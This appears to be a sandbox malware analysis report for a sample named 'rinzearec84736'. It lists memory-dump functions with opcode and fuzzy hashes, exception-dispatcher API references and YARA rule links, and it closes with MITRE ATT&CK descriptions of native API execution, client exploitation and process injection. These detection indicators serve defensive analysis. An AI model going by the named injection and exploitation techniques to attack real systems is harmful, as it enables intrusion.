Opcode ID: 756a343c7b7cfe8c95cffc972f672ba531ffda062543e7de1449b63ec402ca6a
Instruction ID: d0905d839b24515f269c4cd71884e30fa7077b97910ee2a403de067930ee0f7b
Opcode Fuzzy Hash: 756a343c7b7cfe8c95cffc972f672ba531ffda062543e7de1449b63ec402ca6a
Instruction Fuzzy Hash: 8741D374E05608CBDB18DFA6D8506DEBBB2AF89304F24C12AD418BB265DB385949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00268693 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026876B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6d53b1f1014440d599c80c63be5181bf39be7d0b5de0dd26228e062282f867f8
Instruction ID: 379c77b8b2e7a732dd9d8672d1d913446b35d726f941847489489af07b0f7cd0
Opcode Fuzzy Hash: 6d53b1f1014440d599c80c63be5181bf39be7d0b5de0dd26228e062282f867f8
Instruction Fuzzy Hash: 9341D2B0E01208CBDB18DFEAD9546DEFBB2AF89304F24C12AD404AB255EB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002608E8 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002609C3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6e64fa8afe99d61c84e4927f9b7827a98c35f600144dc9ae43cd7f9b02daf128
Instruction ID: b0cb7983a62f1d49e51dfd306543d47afd9d4ffd3ae6f52a9e6567a573fce661
Opcode Fuzzy Hash: 6e64fa8afe99d61c84e4927f9b7827a98c35f600144dc9ae43cd7f9b02daf128
Instruction Fuzzy Hash: FA41E4B0E012488FDB18DFEAD8946DEBBB2AF99304F24C12AD414AB359DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002615F1 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002616CB

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 87c46a25f6a621928dd0a28dcfff22d4ec1b1e93886d7485ebecc9486eb1984d
Instruction ID: fe5df70d90f64241c70946ba1fb53bd5c0ea27bd239e3bb1d4de45969f23e030
Opcode Fuzzy Hash: 87c46a25f6a621928dd0a28dcfff22d4ec1b1e93886d7485ebecc9486eb1984d
Instruction Fuzzy Hash: F741F2B0E012488BDB18DFEAC8506DEFBF6AF89304F28C12AD408BB259DB345955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00261EA0 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00261F7B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cc1b3bffb3b87760743d151cc44d0aad3004e5bc5b445817f30142ab1e591fbc
Instruction ID: cfd9bd7a91944d00a125afb6e8da3b5297d35ef03d46f90cae52f7f4354bb477
Opcode Fuzzy Hash: cc1b3bffb3b87760743d151cc44d0aad3004e5bc5b445817f30142ab1e591fbc
Instruction Fuzzy Hash: CD41E1B0E00608CBEB18DFEAD8546EEFBB2BF89304F24C12AD404AB259DB345955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00260490 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026056B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 96b4432f63b7c90eaababccdb5f1456083b5cd7eeab1fdfc8a7d6ad929e0949c
Instruction ID: 42f8737c8d2de4545ebd494047acda5a61bffaf53a875537558c2c5c2ac2cac8
Opcode Fuzzy Hash: 96b4432f63b7c90eaababccdb5f1456083b5cd7eeab1fdfc8a7d6ad929e0949c
Instruction Fuzzy Hash: 8341D2B0E05248CBDB18DFAAD9946DEFBB2AF89304F24C12AD418BB359DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00267DE0 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00267EBB

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a649a06214b96a202148be24db244a565f7a9462e22bc03728f5d8fea0639f5b
Instruction ID: 6a7b9a062e0ffefb542800db4cd3d6ebb1e23e07ad07d2885b3b1ca791c6993c
Opcode Fuzzy Hash: a649a06214b96a202148be24db244a565f7a9462e22bc03728f5d8fea0639f5b
Instruction Fuzzy Hash: 5441E270E05248CFDB18DFAAD8546DEBBB2AF89304F24C16AC418AB369DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00262300 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002623D3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c15d729f0c360ef5f1272169237d9c23276d4adca8bf543b1084d8d96412f55b
Instruction ID: 248cb299347763b8e5084b42b57c0c8a808a5888d104c054e013d7cb82dd348e
Opcode Fuzzy Hash: c15d729f0c360ef5f1272169237d9c23276d4adca8bf543b1084d8d96412f55b
Instruction Fuzzy Hash: 5941D2B0E01648CBDB18DFAAD5546DEFBB2AF89304F24C12AD418AB259DB385949CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001C4CA8 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc7f1d829e22aaf17fd24ae06abd76adf836d10087d872bf531eb5102fa672d
Instruction ID: 1b3df0405ac70decb54e3f3d3cfe8c715a27a9ad7c2db830878eefb669f820c4
Opcode Fuzzy Hash: 4fc7f1d829e22aaf17fd24ae06abd76adf836d10087d872bf531eb5102fa672d
Instruction Fuzzy Hash: 66E1E474E002188FDB54DFA5C994BDDBBB2FF89304F2085AAD409AB355DB359A86CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001CE580 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105e24f348a8cb32d59d98fa217a9ef1341db2fd70ccabce50692dfee3127fae
Instruction ID: 3990ece64ea78028b115e92b89d8b6fa7cbff019f1cc25af748eec741606ef0b
Opcode Fuzzy Hash: 105e24f348a8cb32d59d98fa217a9ef1341db2fd70ccabce50692dfee3127fae
Instruction Fuzzy Hash: 8BD1CF74E00218CFDB55DFA5C990BDDBBB2BF89304F2081AAD409AB365DB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001C5EA0 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dedc5ad28e3b091ec86a45e9b07e807c78dd5746353b9fbb1882e2e8597f0726
Instruction ID: a6d8dd5adfe7eef89a5c2902a2473f5bff3632e7100947fec3276bb8472137a2
Opcode Fuzzy Hash: dedc5ad28e3b091ec86a45e9b07e807c78dd5746353b9fbb1882e2e8597f0726
Instruction Fuzzy Hash: B9D1BF74E00218CFDB54DFA5C994BDDBBB2BF89304F2081AAD809AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001CE129 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d859360648227b004c7ce3e9e22cd5fe67a602538351f42dc7a5c3fcf787acc5
Instruction ID: 23200aea43f8aaa90d230a0cb17c02ae2506273e147b4ee05bef63f4d375454c
Opcode Fuzzy Hash: d859360648227b004c7ce3e9e22cd5fe67a602538351f42dc7a5c3fcf787acc5
Instruction Fuzzy Hash: 84C1BE74E00218CFDB65DFA5D990BDDBBB2BF89304F2081AAD409AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001C55E1 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2296a063ef2c54333bdafc80edfccf09d273d48b5b7008a860341a23235821
Instruction ID: 3b0791744b2d81e8bfc5acf70c300b92e754aa1533cffeb238d913d05a66f2e1
Opcode Fuzzy Hash: 8d2296a063ef2c54333bdafc80edfccf09d273d48b5b7008a860341a23235821
Instruction Fuzzy Hash: 6BD1BF74E00218CFDB54DFA5C994BDDBBB2BF89304F2081AAD809AB355DB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001CF6E0 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71bf89371f22d57ea3859acc2a42847003007552222b8459715f4b413b24dd5a
Instruction ID: cc0c5bae26d37f1155f705a12ed5207de1fee9e08da8bfa4ad7339536bdac47f
Opcode Fuzzy Hash: 71bf89371f22d57ea3859acc2a42847003007552222b8459715f4b413b24dd5a
Instruction Fuzzy Hash: 73C1AE74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD509AB355DB359E86CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001CFB38 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fe5a30e24fb68a24a894de2b694be1f6a89b4f4f45432bd0bce40d4d6e8c1de
Instruction ID: 2cdafeadb7d35fa14359e73b57a4bda5b849dfe917c9eca5eedcf5397dab4564
Opcode Fuzzy Hash: 7fe5a30e24fb68a24a894de2b694be1f6a89b4f4f45432bd0bce40d4d6e8c1de
Instruction Fuzzy Hash: 6AC1AF74E00218CFDB55DFA5C994B9DBBB2BF89304F2081AAD409AB355DB359E86CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001CEE30 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1540ab1710447be2181e29f004dfe2a804643c14e3de007daa954992aed058
Instruction ID: 56633b1faa0b0c1f1779e345c76c6184c8491dd185bdd6a747bfb14bd98d0334
Opcode Fuzzy Hash: 5e1540ab1710447be2181e29f004dfe2a804643c14e3de007daa954992aed058
Instruction Fuzzy Hash: 2AC1BF74E00218CFDB55DFA5D990B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001C5181 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69c5b39061016b2764828177f1798afc3576671fe9641bbd1cc2a5430a37335
Instruction ID: ae0e9c51e826a75afd6bac9a694a2a9cf2a575a1fb5e8c6599189626f693d997
Opcode Fuzzy Hash: c69c5b39061016b2764828177f1798afc3576671fe9641bbd1cc2a5430a37335
Instruction Fuzzy Hash: 60D1A174E01218CFDB54DFA5C994BDDBBB2BF89304F2081AAD809AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001C5A40 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e41c257a80ef1e7a88a1da87240e9b6760fd659947d788f0935041d9c0da049
Instruction ID: fd3f6879ca14e1596df22c986d9c492e9e1206080e2f8313c50da3c7cdc3b65a
Opcode Fuzzy Hash: 2e41c257a80ef1e7a88a1da87240e9b6760fd659947d788f0935041d9c0da049
Instruction Fuzzy Hash: C8D19E74E01218CFDB54DFA5C994BDDBBB2BF89304F2081AAD809AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001CF288 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da86a8c949cc48b282521df8456bedab82bfd4352acff15a74abb3ec5639554a
Instruction ID: 61ccda29f357b4393088426978ddf89786f0f69145ed140d34e61c7076619f54
Opcode Fuzzy Hash: da86a8c949cc48b282521df8456bedab82bfd4352acff15a74abb3ec5639554a
Instruction Fuzzy Hash: 62C19F74E00218CFDB55DFA5C994B9DBBB2BF89304F2081AAD409AB365DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001CE9D9 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3904f1cafac57a5c0f2ab93b68c5f8549a0715a78a3225b22f61c06c63fd9f
Instruction ID: dc4fd351f90cb085bfb9be20a31bbfa1ad2be03c40282042b8c7256a070bf301
Opcode Fuzzy Hash: 1f3904f1cafac57a5c0f2ab93b68c5f8549a0715a78a3225b22f61c06c63fd9f
Instruction Fuzzy Hash: BDC1A074E00218CFDB54DFA5C994BADBBB2BF89304F2081AAD409AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001CDCDC Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fafd51dff204a1fbce09f81b39a5ddf27b4b8443c06c9af9753ddeafbfb46f5e
Instruction ID: b5023017cb6a6b4328d7e7df1b72fee62527e00e2308fa4a71261869d92d4864
Opcode Fuzzy Hash: fafd51dff204a1fbce09f81b39a5ddf27b4b8443c06c9af9753ddeafbfb46f5e
Instruction Fuzzy Hash: 63C1CF74E00218CFDB54DFA5D990B9DBBB2BF89304F2081AAD409AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001C41D8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25bd88022d5a298c88f0c805d2b8aceb5657571398255f53aaad13a9ec06d1c
Instruction ID: df6fb224b6c41faee6f5be20579a5ff855843097573feb9a6cb0b5344fc50e88
Opcode Fuzzy Hash: e25bd88022d5a298c88f0c805d2b8aceb5657571398255f53aaad13a9ec06d1c
Instruction Fuzzy Hash: 35A12874D00208CFEB14DFA9C454BDDBBB1FF89314F209269E508AB291DB749984CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001C4519 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2353ced751543c8a232215691aab25c453b59dc44faa75d3775de3cbfbc2234
Instruction ID: cf31908b15deb871dd871a16dfcc803fac955145043b971923aa6696defb4e29
Opcode Fuzzy Hash: b2353ced751543c8a232215691aab25c453b59dc44faa75d3775de3cbfbc2234
Instruction Fuzzy Hash: 7C912574E04218CFEB24DFA8C894BDCBBB1FF49314F209269E408AB291DB759985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 001C197C Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001C1A16

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 994815d5e13d41f7e620411ed7399707b652a9928d99a973506ac836270c91f7
Instruction ID: 3bfde7747052247687ed8ec714ea3c3caef6905ef44a7869c8b1aabc9665453a
Opcode Fuzzy Hash: 994815d5e13d41f7e620411ed7399707b652a9928d99a973506ac836270c91f7
Instruction Fuzzy Hash: 2D51CC30165A02CFE7406B65FEEC6EEBBB5FB4F3137006E84A20B915219F390444CA92

Uniqueness

Uniqueness Score: -1.00%

Function 001C1980 Relevance: 1.7, APIs: 1, Instructions: 178COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001C1A16

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7c71680d875ec3499b6b57940a86d5f57679988a1c9266bcc59b8655746b3529
Instruction ID: 1ab923c6cae0fb3cf805a7a767e6eea8640555ccef7c039b000246fef9670d90
Opcode Fuzzy Hash: 7c71680d875ec3499b6b57940a86d5f57679988a1c9266bcc59b8655746b3529
Instruction Fuzzy Hash: D351BB30165A12CFE7406B75FEAC6EEBBB5FB5F3137046E84A20B915619F390484CA92

Uniqueness

Uniqueness Score: -1.00%

Function 000BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1171970017.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bd000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c0fbd07fb8e92439a16265b118c328d4a4b90b4b83c38aa5a4cf4303006546
Instruction ID: 1f8a31459d057162c3aeba986bd6dd9ad09e417af2a8b20d1228feef2f150cbf
Opcode Fuzzy Hash: 26c0fbd07fb8e92439a16265b118c328d4a4b90b4b83c38aa5a4cf4303006546
Instruction Fuzzy Hash: 10210775604244EFCB24EF14D884B66FBA5EB88314F34C56AE9094B246D337D847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1171970017.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bd000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e19f964a602297a2a1ccf38e8b8695a6a59b180971d9393f93eb6515a1e8e6
Instruction ID: 529a7ad9df055a80f02855959b454aafbba47b02dd4f8e6b208c9808c45ee2ae
Opcode Fuzzy Hash: b5e19f964a602297a2a1ccf38e8b8695a6a59b180971d9393f93eb6515a1e8e6
Instruction Fuzzy Hash: 86217F754083809FCB02CF24D994B11BFB1EB46314F28C5EBD8498B266D33A9856CB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001C26E8 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99bdf44c9d21eecc254965a0666953b6ae348295bd6eed0075af985585777095
Instruction ID: 5feebc56cac3451627653a0500ac8c5da3db8fb71699216f028ea5e4de3748b7
Opcode Fuzzy Hash: 99bdf44c9d21eecc254965a0666953b6ae348295bd6eed0075af985585777095
Instruction Fuzzy Hash: 5D528A74E012288FDB64DFA5C880BDDBBB2BB89304F1185EAD509AB354DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001C35D0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c33f46cf51d960e0b438381f374d085621fbb997e66876b1abad302cbf7acbd8
Instruction ID: 1c4bf834b6bbdb31a96a841395aeefe087bc1c909cd1227daa6d397eaba54e94
Opcode Fuzzy Hash: c33f46cf51d960e0b438381f374d085621fbb997e66876b1abad302cbf7acbd8
Instruction Fuzzy Hash: C042C0B4E002288FDB65DF64C880BEDBBB2BB59308F6085E9D419A7355DB319E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00264EA8 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 532d129bd7e497af8342cf7404b3b3a48f729c4f554c01b8be74f0acdeb31fe8
Instruction ID: ff80e3eaab97b3ccad009a7420e7a043c2e0978700b860b3abd9de7afeb72861
Opcode Fuzzy Hash: 532d129bd7e497af8342cf7404b3b3a48f729c4f554c01b8be74f0acdeb31fe8
Instruction Fuzzy Hash: 6BB1B774E10218CFDB54DFA9D894A9DBBB2FF89304F2081A9D819AB365DB30AD41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001C2D1A Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f688adcb7664558f68b263fd7153aa10f7d3d69fa25d82b71802a2bffa78b779
Instruction ID: 91f4a32dd447908f8ca47ccfac4f6f7bebc01b4db9c23a9c87bd3799db6045d9
Opcode Fuzzy Hash: f688adcb7664558f68b263fd7153aa10f7d3d69fa25d82b71802a2bffa78b779
Instruction Fuzzy Hash: 71A18C74A01228CFDB64DF64C890BDAB7B2BB4A305F2195EAD50EA7350DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001C2EF9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172094679.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1c0000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd0c163d7e4df58eaacd30bf53598523de0f51e412d512cf096aa2f6aab2c0c
Instruction ID: 8b7f1f570dcc861bb21294c7545839cc1c388408760aa07ddf2f4e64d618804f
Opcode Fuzzy Hash: edd0c163d7e4df58eaacd30bf53598523de0f51e412d512cf096aa2f6aab2c0c
Instruction Fuzzy Hash: 08519D74A01228CFCB64DF24C894BEEB7B2BB4A305F6095E9D50AA7350CB359E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002651BE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28bb6f78795552f7e8b83a5d9e83030346274f0ba55b801a3ebf662c2cb30e15
Instruction ID: 45535abd702d60fe8e254609f5518a9de0c7e605c1bf2ee000268f8c84fa50d0
Opcode Fuzzy Hash: 28bb6f78795552f7e8b83a5d9e83030346274f0ba55b801a3ebf662c2cb30e15
Instruction Fuzzy Hash: BFD09E39E142589BCF10DF54DC517AEF371FB46314F1175D5D10DA3200D7705E609A66

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
